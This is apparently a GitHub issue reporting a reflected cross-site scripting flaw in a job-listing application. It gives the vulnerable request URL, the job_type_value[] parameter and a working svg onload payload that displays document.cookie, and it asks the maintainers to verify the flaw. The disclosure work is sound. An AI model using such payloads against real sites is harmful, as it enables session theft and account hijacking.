Open jamesdwilson opened 3 years ago
I was able to reproduce this XSS from a post I found on packetnews: https://packetstormsecurity.com/files/152246/
Can you please test this and other issues as I linked above? I was personally unable to verify the others, but this one I was.
Thank you.
Request: http://localhost/[PATH]/jobs?_=1&job_type_value[]=Full%20time&srch_location_val[]=fulltime_ctype
Vulnerable Parameter: job_type_value[] (GET)
Payload: "><svg+onload%3Dalert(document.cookie)>